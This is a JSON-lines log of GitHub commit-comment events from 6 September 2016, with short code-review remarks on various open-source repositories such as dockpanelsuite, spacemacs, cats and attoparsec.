{"id":"4519462565","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"Algorithman/dockpanelsuite"},"payload":{"comment":{"id":18906140,"position":null,"line":null,"path":null,"commit_id":"eee4cb5f2c6a78a7e7eb98b216f3054063b7a08f","created_at":"2016-09-06T06:30:26Z","updated_at":"2016-09-06T06:30:26Z","body":"More discussion can be found at https://github.com/dockpanelsuite/dockpanelsuite/issues/356. This commit was reviewed but not accepted."}},"created_at":"2016-09-06T06:30:26Z"}
{"id":"4519464209","type":"CommitCommentEvent","actor":{"login":"ngeiswei"},"repo":{"name":"opencog/ros-behavior-scripting"},"payload":{"comment":{"id":18906142,"position":5,"line":40,"path":"src/psi-behavior.scm","commit_id":"a655a14be7f21f516612911717669ea23eefc5a6","created_at":"2016-09-06T06:30:57Z","updated_at":"2016-09-06T06:30:57Z","body":"@AmeBel you forgot the closing parenthesis."}},"created_at":"2016-09-06T06:30:57Z"}
{"id":"4519464546","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"Algorithman/dockpanelsuite"},"payload":{"comment":{"id":18906144,"position":null,"line":null,"path":null,"commit_id":"db97174ad98dcd40dc4507ff34b12f79c63cd815","created_at":"2016-09-06T06:31:04Z","updated_at":"2016-09-06T06:31:04Z","body":"Reviewed but not accepted."}},"created_at":"2016-09-06T06:31:04Z"}
{"id":"4519465054","type":"CommitCommentEvent","actor":{"login":"kccai"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":18906147,"position":null,"line":null,"path":null,"commit_id":"047b57223a8913699bc9ce52aa3046d934f40c9f","created_at":"2016-09-06T06:31:13Z","updated_at":"2016-09-06T06:31:13Z","body":"@nixmaniack  `osx-use-dictionary-app` is only defined in the `osx` layer. For users that do not use `osx` layer, this commit will break spacemacs as @rgrinberg described."}},"created_at":"2016-09-06T06:31:13Z"}
{"id":"4519465477","type":"CommitCommentEvent","actor":{"login":"Workshop2"},"repo":{"name":"TotalJobsGroup/Syringe"},"payload":{"comment":{"id":18906148,"position":null,"line":null,"path":null,"commit_id":"8818ec3abad112ddc3c3513ca57a3b796d28143d","created_at":"2016-09-06T06:31:21Z","updated_at":"2016-09-06T06:31:21Z","body":"#223 - timer is configurable via the Configuration.json"}},"created_at":"2016-09-06T06:31:21Z"}
{"id":"4519467395","type":"CommitCommentEvent","actor":{"login":"fnoks"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":18906151,"position":25,"line":242,"path":"scripts/interaction.js","commit_id":"86654dcffb2d4463c73924e2bc2e64c69008841d","created_at":"2016-09-06T06:31:56Z","updated_at":"2016-09-06T06:31:56Z","body":"Fixed. Had forgotten to push something :)"}},"created_at":"2016-09-06T06:31:56Z"}
{"id":"4519477118","type":"CommitCommentEvent","actor":{"login":"timurkapalov"},"repo":{"name":"arcelormittalkriviyrih/isa95_database"},"payload":{"comment":{"id":18906163,"position":null,"line":null,"path":null,"commit_id":"6dd8b75344603724442cf02f1abcd3912e9afe91","created_at":"2016-09-06T06:35:12Z","updated_at":"2016-09-06T06:35:12Z","body":"Добавление поля MaterialDefinitionID для дальнейшего создания FK \"саму на себя\" (в рамках проекта \"График выплавки\"):\r\n1. СТ3ПС                   // базовая марка\r\n......\r\n8. ДСТУ8888         1  // марка СТ3ПС ДСТУ8888, ссылается за базовую марку с ID = 1.\r\n10. МНЛЗ             1  // марка СТ3ПС МНЛЗ, ссылается за базовую марку с ID = 1."}},"created_at":"2016-09-06T06:35:12Z"}
{"id":"4519477137","type":"CommitCommentEvent","actor":{"login":"TomasMikula"},"repo":{"name":"typelevel/cats"},"payload":{"comment":{"id":18906164,"position":35,"line":35,"path":"kernel-laws/src/main/scala/cats/kernel/laws/OrderLaws.scala","commit_id":"157710f9f64308247b9f6d4e373a22127d0d235b","created_at":"2016-09-06T06:35:12Z","updated_at":"2016-09-06T06:35:12Z","body":"Should this be called the _substitution property_ rather than antisymmetry? Citing from the [Wikipedia page on Equality](https://en.wikipedia.org/wiki/Equality_(mathematics)#Some_basic_logical_properties_of_equality):\r\n\r\n> The substitution property states:\r\n> - For any quantities _a_ and _b_ and any expression _F(x)_, if _a = b_, then _F(a) = F(b)_ (if both sides make sense, i.e. are well-formed).\r\n\r\n/cc @non @johnynek @rklaehn"}},"created_at":"2016-09-06T06:35:12Z"}
{"id":"4519482793","type":"CommitCommentEvent","actor":{"login":"sunsys0"},"repo":{"name":"priyorockz/opencart"},"payload":{"comment":{"id":18906176,"position":null,"line":null,"path":null,"commit_id":"094890e4548afaf4cf1192c43ed944498e576d5d","created_at":"2016-09-06T06:36:59Z","updated_at":"2016-09-06T06:36:59Z","body":"Thank you Priyo for the update, now it works fine."}},"created_at":"2016-09-06T06:36:59Z"}
{"id":"4519484568","type":"CommitCommentEvent","actor":{"login":"alizetg"},"repo":{"name":"alizetg/prueba"},"payload":{"comment":{"id":18906179,"position":null,"line":null,"path":null,"commit_id":"83b0535854e1ded7a1c0d41b3203915502d8cfb1","created_at":"2016-09-06T06:37:35Z","updated_at":"2016-09-06T06:37:35Z","body":"![images](https://cloud.githubusercontent.com/assets/22003618/18263868/1f96c1b0-740d-11e6-8aaa-17d5673048ba.jpg)\r\n"}},"created_at":"2016-09-06T06:37:35Z"}
{"id":"4519484627","type":"CommitCommentEvent","actor":{"login":"sunsys0"},"repo":{"name":"priyorockz/opencart"},"payload":{"comment":{"id":18906180,"position":null,"line":null,"path":null,"commit_id":"3c9ac68dd30350a0b81288fa58e214809c83699b","created_at":"2016-09-06T06:37:36Z","updated_at":"2016-09-06T06:37:36Z","body":"Thank you Priyo for the update, now it works fine."}},"created_at":"2016-09-06T06:37:36Z"}
{"id":"4519486496","type":"CommitCommentEvent","actor":{"login":"hzhou81"},"repo":{"name":"hzhou81/xinu"},"payload":{"comment":{"id":18906184,"position":null,"line":null,"path":null,"commit_id":"f2fe1e8b0f690befabad7e11ba9573105bfe3b26","created_at":"2016-09-06T06:38:14Z","updated_at":"2016-09-06T06:38:14Z","body":"When I first use cross compiler, this warning is not clear to use who use Makefile, so I decide to add more words to it , telling people to install both gcc and binutils targeting the platform."}},"created_at":"2016-09-06T06:38:14Z"}
{"id":"4519489716","type":"CommitCommentEvent","actor":{"login":"hongdou0216"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18906187,"position":272,"line":272,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T06:39:15Z","updated_at":"2016-09-06T06:39:15Z","body":"$$each和252行的$$.each一样吗"}},"created_at":"2016-09-06T06:39:15Z"}
{"id":"4519490202","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"dkondrad-jci/dockpanelsuite"},"payload":{"comment":{"id":18906188,"position":null,"line":null,"path":null,"commit_id":"11da00196f8645001054efc2ee1c82e46b604729","created_at":"2016-09-06T06:39:25Z","updated_at":"2016-09-06T06:39:25Z","body":"Tracked under https://github.com/dockpanelsuite/dockpanelsuite/issues/152"}},"created_at":"2016-09-06T06:39:25Z"}
{"id":"4519498751","type":"CommitCommentEvent","actor":{"login":"DjWarmonger"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":18906196,"position":null,"line":null,"path":null,"commit_id":"39c2c6cde76aaca5bb7beb7db1b2c691d8783001","created_at":"2016-09-06T06:42:06Z","updated_at":"2016-09-06T06:42:06Z","body":"What if I really want to add this immunity explicitely?"}},"created_at":"2016-09-06T06:42:06Z"}
{"id":"4519500943","type":"CommitCommentEvent","actor":{"login":"brolaugh"},"repo":{"name":"ITG-Code/stample"},"payload":{"comment":{"id":18906199,"position":null,"line":null,"path":null,"commit_id":"a6de429c0394ae111b8ba6e192b2d48b3b1a0dd1","created_at":"2016-09-06T06:42:46Z","updated_at":"2016-09-06T06:42:46Z","body":"Andra fiiler än morning,md skulle inte komma med i denna commit."}},"created_at":"2016-09-06T06:42:46Z"}
{"id":"4519502581","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"yck1509/dockpanelsuite"},"payload":{"comment":{"id":18906201,"position":79,"line":117,"path":"WinFormsUI/Docking/InertButtonBase.cs","commit_id":"72645c566987fb43fee469770d842f5f49c1fb97","created_at":"2016-09-06T06:43:16Z","updated_at":"2016-09-06T06:43:16Z","body":"It shows how to show pressed image, which is quite useful for VS2012/2013 themes."}},"created_at":"2016-09-06T06:43:16Z"}
{"id":"4519503019","type":"CommitCommentEvent","actor":{"login":"orvice"},"repo":{"name":"webrtc/apprtc"},"payload":{"comment":{"id":18906202,"position":null,"line":null,"path":null,"commit_id":"6efae80c71e9ed9025b251ee5dd9d161643beb4c","created_at":"2016-09-06T06:43:24Z","updated_at":"2016-09-06T06:43:24Z","body":"fixed in #360"}},"created_at":"2016-09-06T06:43:24Z"}
{"id":"4519507383","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"petertodd/python-bitcoinlib"},"payload":{"comment":{"id":18906210,"position":null,"line":null,"path":null,"commit_id":"0d6e65a235946ff0fd6b931db82ec2bc5b97a20f","created_at":"2016-09-06T06:44:44Z","updated_at":"2016-09-06T06:44:44Z","body":"0d6e65a"}},"created_at":"2016-09-06T06:44:44Z"}
{"id":"4519509201","type":"CommitCommentEvent","actor":{"login":"boutros"},"repo":{"name":"digibib/ls.ext"},"payload":{"comment":{"id":18906211,"position":null,"line":null,"path":null,"commit_id":"2ba3b5b831aa083956fd6b6e4215085d6adbcb72","created_at":"2016-09-06T06:45:16Z","updated_at":"2016-09-06T06:45:16Z","body":"En test som feiler etter denne endringen:\r\n\r\n`no.deichman.services.services.AppTest > test_update_work_index_when_publication_is_updated FAILED`\r\n"}},"created_at":"2016-09-06T06:45:16Z"}
{"id":"4519509278","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"petertodd/python-bitcoinlib"},"payload":{"comment":{"id":18906212,"position":null,"line":null,"path":null,"commit_id":"c7fbc6122a545385cb299b5a0a5b728b6c4de66f","created_at":"2016-09-06T06:45:17Z","updated_at":"2016-09-06T06:45:17Z","body":"c7fbc61"}},"created_at":"2016-09-06T06:45:17Z"}
{"id":"4519509762","type":"CommitCommentEvent","actor":{"login":"nixmaniack"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":18906214,"position":null,"line":null,"path":null,"commit_id":"047b57223a8913699bc9ce52aa3046d934f40c9f","created_at":"2016-09-06T06:45:24Z","updated_at":"2016-09-06T06:45:24Z","body":"@kccai Oh I see the new change now. This was working before as a side-effect of wrong syntax! \r\n\r\nI think [this](https://github.com/syl20bnr/spacemacs/blob/03143b61f2939817163dbff8f693cb4ae7bbc937/layers/+spacemacs/spacemacs-language/packages.el#L13) should be fixable by changing `not` to `bound-and-true-p`. Haven't tested though."}},"created_at":"2016-09-06T06:45:24Z"}
{"id":"4519509814","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"yck1509/dockpanelsuite"},"payload":{"comment":{"id":18906215,"position":null,"line":null,"path":null,"commit_id":"72645c566987fb43fee469770d842f5f49c1fb97","created_at":"2016-09-06T06:45:25Z","updated_at":"2016-09-06T06:45:25Z","body":"Tracked under https://github.com/dockpanelsuite/dockpanelsuite/issues/397"}},"created_at":"2016-09-06T06:45:25Z"}
{"id":"4519513233","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"petertodd/python-bitcoinlib"},"payload":{"comment":{"id":18906220,"position":null,"line":null,"path":null,"commit_id":"43530c8837857026a6a90d29e1ac7ea83be5665e","created_at":"2016-09-06T06:46:28Z","updated_at":"2016-09-06T06:46:28Z","body":"43530c8"}},"created_at":"2016-09-06T06:46:28Z"}
{"id":"4519515037","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"yck1509/dockpanelsuite"},"payload":{"comment":{"id":18906222,"position":5,"line":14,"path":"WinFormsUI/Docking/InertButtonBase.cs","commit_id":"4b90c2450d91071e070c128d45cfd4dd6a965c53","created_at":"2016-09-06T06:47:01Z","updated_at":"2016-09-06T06:47:01Z","body":"Double buffer can be useful."}},"created_at":"2016-09-06T06:47:01Z"}
{"id":"4519518738","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"yck1509/dockpanelsuite"},"payload":{"comment":{"id":18906227,"position":null,"line":null,"path":null,"commit_id":"4b90c2450d91071e070c128d45cfd4dd6a965c53","created_at":"2016-09-06T06:48:10Z","updated_at":"2016-09-06T06:48:10Z","body":"Tracked under https://github.com/dockpanelsuite/dockpanelsuite/issues/398"}},"created_at":"2016-09-06T06:48:10Z"}
{"id":"4519522825","type":"CommitCommentEvent","actor":{"login":"ari"},"repo":{"name":"ari/jobsworth"},"payload":{"comment":{"id":18906236,"position":null,"line":null,"path":null,"commit_id":"35ece292ab97c5c03c069423aa4fa641a1ad262b","created_at":"2016-09-06T06:49:19Z","updated_at":"2016-09-06T06:49:19Z","body":"Where are we putting the foreign key back?"}},"created_at":"2016-09-06T06:49:19Z"}
{"id":"4519523709","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18906237,"position":null,"line":null,"path":null,"commit_id":"4ca2f3099f7b51c0163df93026808e677e2fcf2c","created_at":"2016-09-06T06:49:33Z","updated_at":"2016-09-06T06:49:33Z","body":"Nice usability improvement!"}},"created_at":"2016-09-06T06:49:33Z"}
{"id":"4519523862","type":"CommitCommentEvent","actor":{"login":"olegts"},"repo":{"name":"xpinjection/java8-misuses"},"payload":{"comment":{"id":18906238,"position":17,"line":21,"path":"src/com/xpinjection/java8/misused/stream/ManualCollection.java","commit_id":"5370318d2c96e934a4b0346727417479a3af0a2a","created_at":"2016-09-06T06:49:36Z","updated_at":"2016-09-06T06:49:36Z","body":"NestedForEach and ExternalCollectionForGrouping"}},"created_at":"2016-09-06T06:49:36Z"}
{"id":"4519524609","type":"CommitCommentEvent","actor":{"login":"good4ram"},"repo":{"name":"good4ram/sendmailR"},"payload":{"comment":{"id":18906243,"position":null,"line":null,"path":null,"commit_id":"3c0ac0c03a37e49b652c0f79dc9322558881618e","created_at":"2016-09-06T06:49:51Z","updated_at":"2016-09-06T06:49:51Z","body":"dd"}},"created_at":"2016-09-06T06:49:51Z"}
{"id":"4519526392","type":"CommitCommentEvent","actor":{"login":"loriab"},"repo":{"name":"jturney/psi4"},"payload":{"comment":{"id":18906249,"position":24,"line":47,"path":"psi4/src/psi4/libfilesystem/path.cc","commit_id":"46e3f8a1efa2e503a650a9183365a400ecc1e569","created_at":"2016-09-06T06:50:24Z","updated_at":"2016-09-06T06:50:24Z","body":"@jturney , I think this is deleting `temp` before it can return `path(temp)`, and that empty path is at least partly what's going wrong with efp calcs."}},"created_at":"2016-09-06T06:50:24Z"}
{"id":"4519527718","type":"CommitCommentEvent","actor":{"login":"JDogg1329"},"repo":{"name":"JDogg1329/sREPS"},"payload":{"comment":{"id":18906256,"position":168,"line":127,"path":"items.php","commit_id":"8d514590cfb3f1086ab2b25f1166e192bde31fdf","created_at":"2016-09-06T06:50:47Z","updated_at":"2016-09-06T06:50:47Z","body":"#1"}},"created_at":"2016-09-06T06:50:47Z"}
{"id":"4519537020","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"tsanie/dockpanelsuite"},"payload":{"comment":{"id":18906264,"position":null,"line":null,"path":null,"commit_id":"3bd794031db9402b606b154e641ff41aa9c76cf8","created_at":"2016-09-06T06:53:12Z","updated_at":"2016-09-06T06:53:12Z","body":"Tracked under https://github.com/dockpanelsuite/dockpanelsuite/issues/384"}},"created_at":"2016-09-06T06:53:12Z"}
{"id":"4519541589","type":"CommitCommentEvent","actor":{"login":"DavidWalz"},"repo":{"name":"CRPropa/CRPropa3"},"payload":{"comment":{"id":18906277,"position":9,"line":12,"path":"src/module/common.cpp","commit_id":"2d131275041e6d7431b47f655b41d59b9caaf57d","created_at":"2016-09-06T06:54:24Z","updated_at":"2016-09-06T06:54:24Z","body":"Good idea: build/data could be the first option. @geromueller @adundovi "}},"created_at":"2016-09-06T06:54:24Z"}
{"id":"4519543578","type":"CommitCommentEvent","actor":{"login":"524433885"},"repo":{"name":"shudingbo/node-cppMsg"},"payload":{"comment":{"id":18906282,"position":null,"line":null,"path":null,"commit_id":"447c9577d644b6f065c2ad5af407a887b9f39e36","created_at":"2016-09-06T06:54:57Z","updated_at":"2016-09-06T06:54:57Z","body":"求大神补个d.ts"}},"created_at":"2016-09-06T06:54:57Z"}
{"id":"4519544541","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"shintadono/dockpanelsuite"},"payload":{"comment":{"id":18906288,"position":null,"line":null,"path":null,"commit_id":"b1ccc75b3459a8c0747f874a9ab18625ebae3979","created_at":"2016-09-06T06:55:15Z","updated_at":"2016-09-06T06:55:15Z","body":"Tracked under https://github.com/dockpanelsuite/dockpanelsuite/issues/391"}},"created_at":"2016-09-06T06:55:15Z"}
{"id":"4519546653","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"shintadono/dockpanelsuite"},"payload":{"comment":{"id":18906294,"position":null,"line":null,"path":null,"commit_id":"e3c4a27e0c59fa199e0355764a12662cf106617f","created_at":"2016-09-06T06:55:49Z","updated_at":"2016-09-06T06:55:49Z","body":"Tracked under https://github.com/dockpanelsuite/dockpanelsuite/issues/391"}},"created_at":"2016-09-06T06:55:49Z"}
{"id":"4519547179","type":"CommitCommentEvent","actor":{"login":"bearofbear"},"repo":{"name":"bearofbear/JIAODA"},"payload":{"comment":{"id":18906295,"position":null,"line":null,"path":null,"commit_id":"a729d86f836552482dae4fe71ad52f11587d5b08","created_at":"2016-09-06T06:55:58Z","updated_at":"2016-09-06T06:55:58Z","body":"# 功能介绍：\r\n\r\n"}},"created_at":"2016-09-06T06:55:58Z"}
{"id":"4519547908","type":"CommitCommentEvent","actor":{"login":"rschoem"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18906296,"position":null,"line":null,"path":null,"commit_id":"bc5bcadbf22e74634380c56b72f59aa5c940e08f","created_at":"2016-09-06T06:56:11Z","updated_at":"2016-09-06T06:56:11Z","body":"@kholia Thanks for the heads-up, but already done."}},"created_at":"2016-09-06T06:56:11Z"}
{"id":"4519549603","type":"CommitCommentEvent","actor":{"login":"bearofbear"},"repo":{"name":"bearofbear/JIAODA"},"payload":{"comment":{"id":18906299,"position":null,"line":null,"path":null,"commit_id":"a729d86f836552482dae4fe71ad52f11587d5b08","created_at":"2016-09-06T06:56:38Z","updated_at":"2016-09-06T06:56:38Z","body":"# 功能介绍："}},"created_at":"2016-09-06T06:56:38Z"}
{"id":"4519550761","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906306,"position":2,"line":429,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:56:57Z","updated_at":"2016-09-06T06:56:57Z","body":"Stop "}},"created_at":"2016-09-06T06:56:57Z"}
{"id":"4519551080","type":"CommitCommentEvent","actor":{"login":"rschoem"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18906307,"position":null,"line":null,"path":null,"commit_id":"c762b62a7e90bfd425e1a9856ae34b55d8eb8ce3","created_at":"2016-09-06T06:57:03Z","updated_at":"2016-09-06T06:57:03Z","body":"Ok, no problem. Thanks for updating!\r\n"}},"created_at":"2016-09-06T06:57:03Z"}
{"id":"4519551101","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906308,"position":11,"line":435,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:57:03Z","updated_at":"2016-09-06T06:57:03Z","body":"Stop "}},"created_at":"2016-09-06T06:57:03Z"}
{"id":"4519551493","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906309,"position":13,"line":437,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:57:11Z","updated_at":"2016-09-06T06:57:11Z","body":"Stop "}},"created_at":"2016-09-06T06:57:11Z"}
{"id":"4519551894","type":"CommitCommentEvent","actor":{"login":"alexvins"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":18906311,"position":null,"line":null,"path":null,"commit_id":"39c2c6cde76aaca5bb7beb7db1b2c691d8783001","created_at":"2016-09-06T06:57:16Z","updated_at":"2016-09-06T06:57:16Z","body":"- only DefaultSpellMechanics is actually moddable by design\r\n- I`ll try to add special immunity handling similar to DispellMechanics::isImmuneByStack"}},"created_at":"2016-09-06T06:57:16Z"}
{"id":"4519552119","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906312,"position":14,"line":438,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:57:20Z","updated_at":"2016-09-06T06:57:20Z","body":"Stop "}},"created_at":"2016-09-06T06:57:20Z"}
{"id":"4519552762","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906314,"position":17,"line":441,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:57:31Z","updated_at":"2016-09-06T06:57:31Z","body":"Stop "}},"created_at":"2016-09-06T06:57:31Z"}
{"id":"4519553386","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"tsanie/dockpanelsuite"},"payload":{"comment":{"id":18906315,"position":null,"line":null,"path":null,"commit_id":"5a2da9aad85d1a6342f4c7f9fc0859eefe441162","created_at":"2016-09-06T06:57:42Z","updated_at":"2016-09-06T06:57:42Z","body":"Tracked under https://github.com/dockpanelsuite/dockpanelsuite/issues/386"}},"created_at":"2016-09-06T06:57:42Z"}
{"id":"4519553583","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906317,"position":6,"line":431,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:57:46Z","updated_at":"2016-09-06T06:57:46Z","body":"Stop "}},"created_at":"2016-09-06T06:57:46Z"}
{"id":"4519553983","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906319,"position":7,"line":432,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:57:53Z","updated_at":"2016-09-06T06:57:53Z","body":"Stop "}},"created_at":"2016-09-06T06:57:53Z"}
{"id":"4519554555","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906321,"position":10,"line":434,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:58:02Z","updated_at":"2016-09-06T06:58:02Z","body":"Stop "}},"created_at":"2016-09-06T06:58:02Z"}
{"id":"4519555170","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906325,"position":6,"line":431,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:58:13Z","updated_at":"2016-09-06T06:58:13Z","body":"Stop "}},"created_at":"2016-09-06T06:58:13Z"}
{"id":"4519555571","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906326,"position":5,"line":432,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:58:20Z","updated_at":"2016-09-06T06:58:20Z","body":"Stop "}},"created_at":"2016-09-06T06:58:20Z"}
{"id":"4519555769","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"tsanie/dockpanelsuite"},"payload":{"comment":{"id":18906327,"position":null,"line":null,"path":null,"commit_id":"3b9c6fb971b02e74bd0592b88154fafb6fdcb849","created_at":"2016-09-06T06:58:23Z","updated_at":"2016-09-06T06:58:23Z","body":"The upstream uses a better approach."}},"created_at":"2016-09-06T06:58:23Z"}
{"id":"4519556040","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906330,"position":5,"line":432,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:58:27Z","updated_at":"2016-09-06T06:58:27Z","body":"Stop "}},"created_at":"2016-09-06T06:58:27Z"}
{"id":"4519556429","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906331,"position":6,"line":431,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:58:35Z","updated_at":"2016-09-06T06:58:35Z","body":"Stop "}},"created_at":"2016-09-06T06:58:35Z"}
{"id":"4519556796","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906333,"position":9,"line":434,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:58:41Z","updated_at":"2016-09-06T06:58:41Z","body":"Stop "}},"created_at":"2016-09-06T06:58:41Z"}
{"id":"4519557207","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906334,"position":10,"line":434,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:58:47Z","updated_at":"2016-09-06T06:58:47Z","body":"Stop "}},"created_at":"2016-09-06T06:58:47Z"}
{"id":"4519557680","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906335,"position":14,"line":438,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:58:57Z","updated_at":"2016-09-06T06:58:57Z","body":"Stop "}},"created_at":"2016-09-06T06:58:57Z"}
{"id":"4519558096","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906337,"position":10,"line":434,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:59:06Z","updated_at":"2016-09-06T06:59:06Z","body":"Stop "}},"created_at":"2016-09-06T06:59:06Z"}
{"id":"4519558462","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906339,"position":11,"line":435,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:59:12Z","updated_at":"2016-09-06T06:59:12Z","body":"Stop "}},"created_at":"2016-09-06T06:59:12Z"}
{"id":"4519558965","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906341,"position":13,"line":437,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:59:19Z","updated_at":"2016-09-06T06:59:19Z","body":"Stop "}},"created_at":"2016-09-06T06:59:19Z"}
{"id":"4519559306","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906342,"position":14,"line":438,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:59:25Z","updated_at":"2016-09-06T06:59:25Z","body":"Stop "}},"created_at":"2016-09-06T06:59:25Z"}
{"id":"4519559653","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906343,"position":17,"line":441,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:59:31Z","updated_at":"2016-09-06T06:59:31Z","body":"Stop "}},"created_at":"2016-09-06T06:59:31Z"}
{"id":"4519560122","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906347,"position":14,"line":438,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:59:39Z","updated_at":"2016-09-06T06:59:39Z","body":"Stop "}},"created_at":"2016-09-06T06:59:39Z"}
